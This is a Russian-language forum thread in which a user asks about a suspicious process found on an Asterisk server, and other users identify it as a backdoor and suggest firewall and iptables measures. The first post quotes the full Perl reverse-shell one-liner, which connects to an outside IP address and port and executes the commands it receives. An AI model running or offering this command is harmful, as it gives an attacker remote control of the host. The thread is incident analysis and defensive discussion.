Странный процес на сервере с Астериском

Linux/*BSD и всё что с ними связано.

Модераторы: Admins, Модераторы

Ответить
EXA
Сообщения: 487
Зарегистрирован: 24 фев 2008, 17:28

Странный процес на сервере с Астериском

Сообщение EXA » 26 дек 2013, 06:19

День добрый, всем.

perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"80.86.88.130:15000");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;

Это процесс который что-то отправляет с стандартного ввода?

bg1
Сообщения: 238
Зарегистрирован: 11 ноя 2010, 21:11

Сообщение bg1 » 04 июл 2014, 21:34

бакдорчик
Свежак chan_dongle тут https://github.com/bg111/asterisk-chan-dongle/
Смена IMEI Huawei E1550 E173 E1752 K3765 http://www.e1550.mobi/ от $0,3042 за IMEI

Аватара пользователя
anest
Модератор
Сообщения: 5696
Зарегистрирован: 28 ноя 2004, 10:04

Сообщение anest » 05 июл 2014, 01:07

Наверное пора подумать о создании smart файрволов и тп. Я счас изучаю packetfence, перспективный проект. Но может есть и другие решения для автоматизированного отлавливания любой подозрительной активности и автоматической ее блокировки.

Аватара пользователя
Zavr2008
Сообщения: 534
Зарегистрирован: 19 июл 2013, 00:12
Контактная информация:

Сообщение Zavr2008 » 11 июл 2014, 00:21

Не проще на серваке с Asterisk в iptables правильно настроить цепочку OUTPUT для пакетов TCP? То же самое и на роутике..
Так можно и обнаруживать подобную байду..
http://mh.otx.ru SIP/E1 шлюзы Alvis, Добавь E1 к Asterisk, Проапгрейди Заказчику TDA/LDK!
спец цены

Ответить